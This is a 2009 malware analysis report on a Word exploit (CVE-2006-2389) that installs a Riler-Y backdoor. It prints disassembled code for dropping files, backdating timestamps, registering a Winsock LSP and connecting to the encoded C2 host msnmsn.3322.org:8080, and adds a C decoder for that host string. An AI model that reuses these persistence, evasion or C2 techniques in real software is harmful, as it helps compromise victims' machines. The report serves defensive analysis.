Torrid Networks Pvt Ltd
Malware Analysis Report

Submitted to: Confidential
Submitted by: Torrid Networks Pvt Ltd, www.torridnetworks.com
Date: 5th January, 2009

By accepting this document, you agree that neither this document nor the information disclosed herein, nor any part thereof, shall be reproduced or transferred to other documents, or used or disclosed to others for any commercial purpose except as specifically authorized in writing by Torrid. The document has been shared by Torrid for educational purposes only, and Torrid shall not be held liable for any damage that you might cause by performing similar tasks on your machine.

Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
Table of Contents

The Email Attachment
  Behind the Curtains
The Exploit
Anatomy of an Attacker
Observations
  File Changes & Process Binding
    Dynamic Analysis
    Dynamic Analysis
    Static Analysis
      Disassembled binary in Assembly Language
  Service Changes
    Dynamic Analysis
    Static Analysis
      Disassembled binary in Assembly Language
  Registry Changes
    Dynamic Analysis
The Backdoor
  Static Analysis
    Disassembled DLL in C Language
The Control Connection
  Active Attack
  Disabled Attack (Our Scenario)
    Dynamic Analysis
    Static Analysis
      Disassembled DLL in C Language
      Decoding the String
Summary
Conclusion
The Email Attachment

The sole goal of the Word attachment is to transport the exploit and to convince the reader to open it, so that the malicious code can execute.

Behind the Curtains

We submitted the Word attachment to VirusTotal and got the following result summary. The result shows that the Word file is a multistream compound file and carries an exploit with it. The result also shows that the controller is quite old. According to a previous analysis report found on the internet, the controller version at that time was Stealth 2.6, but after completing our analysis we found that this controller version is Stealth 8.1, which seems to be the latest one.
The Exploit

The email message contains a Word attachment that exploits a client-side buffer overflow vulnerability (CVE-2006-2389) in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 SP1 and SP2, and Microsoft Works Suites through 2006. The vulnerability allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 as a zero-day attack.
Anatomy of an Attacker
Observations

File Changes & Process Binding

1. The Word file exploits the vulnerability and executes the payload, which creates an executable file “winsock.exe” in the Temp folder.

Dynamic Analysis

2. The executable file “winsock.exe” further unpacks two embedded components into the system32 folder:
   a) “feelcat.ini”: this file contains the path of winsock.exe, “C:\Documents and Settings\anks\Local Settings\Temp\winsock.exe”
   b) “toonjoke.dll”: detected as Troj/Riler-Gen
3. After the files are created, the backdoor binds toonjoke.dll into svchost as an LSP (Layered Service Provider). Troj/Riler-Y installs the file toonjoke.dll as a Windows Sockets 2 transport provider and reorders the WSC chain so that it gets called first.
Dynamic Analysis

Static Analysis

Disassembled binary in Assembly Language:

1. The following sub-routine creates and opens the file toonjoke.dll and writes data from locations 403014 and 406E14 into it.

    sub_401000 proc near            ; CODE XREF: sub_401533+4Fp
    Filename = dword ptr 4
        push    esi
        push    offset Mode         ; Mode
        push    [esp+8+Filename]    ; Filename
        call    fopen
        mov     esi, eax
        pop     ecx
        test    esi, esi
        pop     ecx
        jnz     short loc_401019
        pop     esi
        retn
    loc_401019:                     ; CODE XREF: sub_401000+15j
        push    esi                 ; File
        push    Count               ; Count
        push    1                   ; Size
        push    offset dword_403014 ; Str
        call    fwrite
        push    0                   ; Origin
        push    0D0h                ; Offset
        push    esi                 ; File
        call    fseek
        push    esi                 ; File
        push    2                   ; Count
        push    1                   ; Size
        push    offset dword_406E14 ; Str
        call    fwrite
        push    esi                 ; File
        call    fclose
        add     esp, 30h
        push    1
        pop     eax
        pop     esi
        retn
    sub_401000 endp

2. The following sub-routine creates and opens the file filecat.ini, whose contents are the path to winsock.exe.

    sub_401983 proc near            ; CODE XREF: sub_401533+5Fp
    Filename = byte ptr -104h
        push    ebp
        mov     ebp, esp
        sub     esp, 104h
        push    esi
        push    offset Buffer
        push    dword_5207A4        ; Format
        lea     eax, [ebp+Filename]
        push    eax                 ; Dest
        call    sprintf
        lea     eax, [ebp+Filename]
        push    offset aW           ; "w"
        push    eax                 ; Filename
        call    fopen
        mov     esi, eax
        add     esp, 14h
        test    esi, esi
        jz      short loc_4019DD
        push    esi                 ; File
        push    offset Filename     ; Str
        call    fputs
        push    esi                 ; File
        push    offset Str          ; "\n"
        call    fputs
        push    esi                 ; File
        call    fclose
        add     esp, 14h
    loc_4019DD:                     ; CODE XREF: sub_401983+39j
        pop     esi
        leave
        retn
    sub_401983 endp
3. At the following location the sub-routine changes the timestamp of toonjoke.dll so that it is not found by sorting on the “Modified Date” column in Windows Explorer. It sets the date back to the year 2000, so the file blends in with older files and does not appear at the top of the Windows\System32 folder among recently modified documents.

    loc_4010B8:                     ; CODE XREF: sub_401056+2Fj
                                    ; sub_401056+3Cj ...
        xor     edi, edi
        push    edi                 ; hTemplateFile
        push    80h                 ; dwFlagsAndAttributes
        push    3                   ; dwCreationDisposition
        push    edi                 ; lpSecurityAttributes
        push    2                   ; dwShareMode
        push    40000000h           ; dwDesiredAccess
        push    [ebp+lpFileName]    ; lpFileName
        call    CreateFileA
        mov     esi, eax
        lea     eax, [ebp+CreationTime]
        push    eax                 ; lpLastWriteTime
        lea     eax, [ebp+CreationTime]
        push    edi                 ; lpLastAccessTime
        push    eax                 ; lpCreationTime
        push    esi                 ; hFile
        call    SetFileTime
        push    esi                 ; hObject
        call    CloseHandle
        pop     edi
        pop     esi
        pop     ebx
        leave
        retn
    sub_401056 endp
Service Changes

A new service, “Windows Socket 2.0 Non-IFS Service Provider Support Environment”, is started.

Dynamic Analysis

The following snapshot shows that a new service, “Windows Socket 2.0 Non-IFS Service Provider Support Environment”, has been started and carries the highest severity level, “1”.

Static Analysis

Disassembled binary in Assembly Language:

1. The following sub-routine calls WSCInstallProvider to register the DLL as an MSNT service provider.

    loc_401674:                     ; CODE XREF: sub_4015B2+D6j
        movsx   dx, Dest[ecx]
        mov     [eax], dx
        inc     ecx
        inc     eax
        inc     eax
        cmp     ecx, 104h
        jl      short loc_401674
        lea     eax, [ebp+var_10]
        push    eax
        lea     eax, [ebp+var_4FC]
        push    1
        push    eax
        lea     eax, [ebp+var_704]
        push    eax
        push    offset dword_406F28
        call    WSCInstallProvider
        cmp     eax, 0FFFFFFFFh
        jz      loc_4018DC
        call    sub_401976
        call    sub_401903
        xor     esi, esi
        cmp     dword_5207AC, ebx
        jle     short loc_401701

2. The following sub-routine calls WSCInstallProvider to register the DLL as an MSNT service chain.

    loc_401786:                     ; CODE XREF: sub_4015B2+154j
        lea     eax, [ebp+var_10]
        push    eax
        lea     eax, [ebp+var_B78]
        push    esi
        push    eax
        lea     eax, [ebp+var_704]
        push    eax
        push    offset dword_406F38
        call    WSCInstallProvider
        cmp     eax, 0FFFFFFFFh
        jnz     short loc_4017BC
        push    [ebp+var_10]
        push    offset aWscinstallprov ; "WSCInstallProvider for chain Error: %d"
        call    printf
        pop     ecx
        pop     ecx
        jmp     loc_4018DC

Registry Changes

The following changes in the registry were observed.

Dynamic Analysis
The Backdoor

After successful exploitation, a backdoor Trojan of the Troj/Riler-Y family is installed.

Static Analysis

Disassembled DLL in C Language:

The following is the list of commands that can be received from the Trojan's control server after a successful connection with the compromised client. Network traffic from client to server also contains the string “VER: Stealth 8.1” along with the IP address, NetBIOS name, OS version, etc. of the compromised host.

    void __thiscall sub_10001970(char *this)
    {
      char *EndPtr; // [sp+0h] [bp-4h]@1

      EndPtr = this;
      off_100059F0 = "VER: Stealth 8.1";
      lpName = "whX3656";
      off_100059F8 = "LOCK";
      off_100059FC = "SEND";
      Format = "%sMS_Woople.ini";
      off_10005A10 = "WAKE";
      off_10005A14 = "NAME";
      off_10005A18 = "MOON";
      off_10005A1C = "KEEP";
      off_10005A20 = "DISK";
      off_10005A24 = "FILE";
      off_10005A28 = "DONE";
      off_10005A2C = "DOWN";
      off_10005A30 = "LONG";
      off_10005A34 = "MAKE";
      off_10005A38 = "ATTR";
      off_10005A3C = "KILL";
      off_10005A40 = "LIKE";
      off_10005A44 = "SEEK";
      off_10005A48 = "READ";
      off_10005A4C = "DEAD";
      off_10005A50 = "DDLL";
      off_10005A54 = "AUTO";
      lpString2 = "DIR:";
      byte_10005A74 = "NAME: %s";
      off_10005A78 = "L_IP: %s";
      off_10005A7C = "MARK: ";
      off_10005A80 = "OS: NT";
      off_10005A84 = "OS: WN";
      off_10005A88 = "%ssourcejob.dat";
      off_10005A8C = "%suidmngr.ini";
      off_10005A90 = "%stupix.ini";
      off_10005AB0[0] = "ERR code = ";
      off_10005AB4 = "F zzz <more>";
      off_10005AB8 = "READY";
      off_10005ABC = "END:";
      off_10005AC0 = "DRIVE %c:";
      off_10005AC4 = "C:\\*.*";
      off_10005AC8 = "%s00";
      dword_1000580C = 371;
      dword_10005810 = strtol("99C", &EndPtr, 10);
      sub_10001930();
The Control Connection

Active Attack

For the Trojan to be effective, the compromised client needs to make a successful connection with the control server, which is a two-step process:

1. A DNS lookup to acquire the address of the control server;
2. The actual connection.

Disabled Attack (Our Scenario)

In our scenario the compromised client did not find the address of the control server, so no control connection is established between them and the compromised client is not able to receive commands from the control server.
Dynamic Analysis

The following packet capture shows that the client was not able to resolve the address for msnmsn.3322.org.
The following packet capture shows that the compromised client wants to establish a connection with the control server (msnmsn.3322.org) on port number 8080. To get going with the analysis, a local DNS server of our own was set up as authoritative for the domain 3322.org, with an A record for msnmsn.3322.org pointing to 10.1.1.130, our own honeypot server used for the analysis.
Static Analysis

Disassembled DLL in C Language:

The following code creates a socket to the encoded hostname FLGFLGejjiieHK@ (msnmsn.3322.org) on the encoded port number ogog (8080).

    signed int __cdecl sub_10002450()
    {
      int v0; // edi@1
      int v1; // ecx@3
      char *v2; // edx@4
      int v3; // ecx@4
      LPSTR (__stdcall *v4)(LPSTR, LPCSTR); // ebx@4
      HANDLE v5; // ebp@6
      u_short v6; // si@6
      signed int v8; // esi@38
      int v9; // esi@50
      const CHAR *v10; // edi@51
      HANDLE v11; // esi@72
      SOCKET v12; // [sp-Ch] [bp-E8h]@15
      char *v13; // [sp-8h] [bp-E4h]@4
      const char *v14; // [sp-8h] [bp-E4h]@15
      const char *v15; // [sp-8h] [bp-E4h]@46
      int v16; // [sp-4h] [bp-E0h]@4
      int v17; // [sp-4h] [bp-E0h]@14
      char *v18; // [sp-4h] [bp-E0h]@46
      char Str; // [sp+10h] [bp-CCh]@4
      HANDLE hObject; // [sp+18h] [bp-C4h]@6
      CHAR String1; // [sp+1Ch] [bp-C0h]@4
      char v22; // [sp+5Ch] [bp-80h]@45

      sub_10002CB0();
      v0 = 0;
      if ( !dword_100064F4 )
        sub_10002BB0();
      v1 = dword_100064F0++;
      if ( v1 <= 5 )
      {
        v4 = lstrcpyA;
        lstrcpyA(&String1, "FLGFLGejjiieHK@ "); // Host name msnmsn.3322.org
        v2 = &Str;
        v16 = (int)"ogog ";                      // Port 8080
        v13 = &Str;
      }
      else
      {
        v4 = lstrcpyA;
        dword_100064F0 = 0;
        lstrcpyA(&String1, "FLGFLGejjiieHK@ ");
        v16 = (int)"ogog ";
        v13 = &Str;
      }
      ((void (__fastcall *)(int, char *, char *, int))v4)(v3, v2, v13, v16);
      sub_10002E60(&String1);
      sub_10002E60(&Str);
The following code decodes the hostname and port number by subtracting 55 from the decimal value of each ASCII character, adding 94 whenever the result falls below 33; a space character terminates the string.

    signed int __cdecl sub_10002E60(const char *a1)
    {
      signed int result; // eax@1
      int v2; // edx@1
      unsigned int v3; // kr00_4@1

      result = 0;
      v2 = 0;
      v3 = strlen(a1);
      if ( (signed int)(v3 - 1) > 0 )
      {
        do
        {
          result = a1[v2];
          if ( result == 32 )
          {
            a1[v2] = 0;
          }
          else
          {
            result -= 55;
            if ( result < 33 )
              result += 94;
            a1[v2] = result;
          }
          ++v2;
        }
        while ( v2 < (signed int)(v3 - 1) );
      }
      return result;
    }
Decoding the String:

As per the above logic, the following table decodes the encoded character string, which yields the hostname “msnmsn.3322.org” and the port number “8080”.

    Character   Decimal value   Result = Dec - 55   If Result < 33: Result + 94   Decoded character
    F           70              15                  109                           m
    L           76              21                  115                           s
    G           71              16                  110                           n
    F           70              15                  109                           m
    L           76              21                  115                           s
    G           71              16                  110                           n
    e           101             46                                                .
    j           106             51                                                3
    j           106             51                                                3
    i           105             50                                                2
    i           105             50                                                2
    e           101             46                                                .
    H           72              17                  111                           o
    K           75              20                  114                           r
    @           64              9                   103                           g
    o           111             56                                                8
    g           103             48                                                0
    o           111             56                                                8
    g           103             48                                                0
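As an added example (not part of the original report), the decoder logic from sub_10002E60 and the table above re-implemented as stand-alone C: a faithful in-place port, plus a non-destructive variant an analyst can run over string constants pulled from a sample. The two encoded constants are the ones the report quotes; all function names are our own.

```c
#include <stdio.h>
#include <string.h>

/* Faithful port of the decoder the report calls sub_10002E60: decodes in
 * place, turns a space (32) into NUL and, like the original loop, stops one
 * byte short of strlen(), so the trailing space itself is never rewritten. */
static int decode_in_place(char *s)
{
    int result = 0;
    int len = (int)strlen(s);
    for (int i = 0; i < len - 1; i++) {
        result = (unsigned char)s[i];
        if (result == 32) {
            s[i] = '\0';
        } else {
            result -= 55;          /* shift every byte down by 55 */
            if (result < 33)       /* wrap back into the printable range */
                result += 94;
            s[i] = (char)result;
        }
    }
    return result;
}

/* Analyst-friendly variant: reads up to the first space and writes into a
 * separate buffer, leaving the encoded constant untouched.
 * Returns the decoded length, or -1 if out is too small. */
static int decode_string(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p && *p != ' '; p++) {
        if (n + 1 >= outsz)
            return -1;
        int c = (int)*p - 55;
        if (c < 33)
            c += 94;
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return (int)n;
}

/* Check helper: 1 if decoding enc (in-place port when in_place is nonzero,
 * otherwise decode_string) yields exactly expected. */
static int decodes_to(const char *enc, const char *expected, int in_place)
{
    char tmp[64];
    if (strlen(enc) >= sizeof tmp)
        return 0;
    if (in_place) {
        strcpy(tmp, enc);
        decode_in_place(tmp);
    } else if (decode_string(enc, tmp, sizeof tmp) < 0) {
        return 0;
    }
    return strcmp(tmp, expected) == 0;
}

int main(void)
{
    /* The two constants the report saw lstrcpyA() copy inside sub_10002450. */
    char host[32], port[8];
    if (decode_string("FLGFLGejjiieHK@ ", host, sizeof host) > 0 &&
        decode_string("ogog ", port, sizeof port) > 0)
        printf("host=%s port=%s\n", host, port);
    return 0;
}
```

Note that the faithful port leaves the terminating space in place (“msnmsn.3322.org ”), which is why the report's decompiled routine is only safe on buffers that end in a space.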
Summary

The control server for the backdoor was set up at msnmsn.3322.org (encoded as FLGFLGejjiieHK@ in the DLL, as shown above), which originates in China. This attack is a pretty old one, and it seems that federal agencies have already taken down the hostname msnmsn.3322.org: there is no DNS record for this sub-domain.

The backdoor is intelligently programmed to resolve the domain name msnmsn.3322.org to an IP address by doing the DNS lookup after a built-in delay, which makes it difficult to catch while analyzing network traffic. There is also no network activity from the backdoor until the DNS lookup has been done.

To check the network activity of the Trojan, we set up a local DNS server with a master DNS zone for 3322.org and added an A record for msnmsn.3322.org pointing to our internal server running the honeypot. We ran the backdoor once again and saw the DNS query resolved by the backdoor to the IP of the honeypot. We captured the traffic with a sniffer and found that, after getting a positive response to the DNS query, the backdoor again waits a few minutes, apparently to confuse the researcher, and only after that delay establishes a TCP connection to the resolved IP address (in our case, the honeypot's IP) on port number 8080 (encoded as ogog in the DLL, as shown above). After establishing the connection on port 8080, it waits for input from the server before performing any activity. Since the control server has been shut down, the backdoor does not receive commands from the remote server and stays as a stealth backdoor waiting for its master to come live again.

This particular attack was reported around 2005. The backdoor payload is very old: it was first reported in 2002 and named the Riler-Y Trojan, and there have been a few variants from this family in the past. Most of the time these are part of a targeted attack and are not attacks seen in the wild.

Analysis suggests that the controller version is Stealth 8.1, which seems to be a newer version of the controller with more features such as remote VNC, command execution, DLL injection, etc.

Conclusion

Although the attack cannot be treated as successful, owing to the unavailability of the control server that was supposed to be hosted at msnmsn.3322.org, it is highly recommended to remove the Trojan from any already compromised machine, either manually by following the analysis above or using antivirus software, to avoid losing control to the attacker in case the dead control server is brought back to life. Also, use a patched version of MS Office for the older versions (2000, 2003); it is always recommended to use the latest product release (MS Office 2007 in this case).

Contact/Feedback: info@torridnetworks.com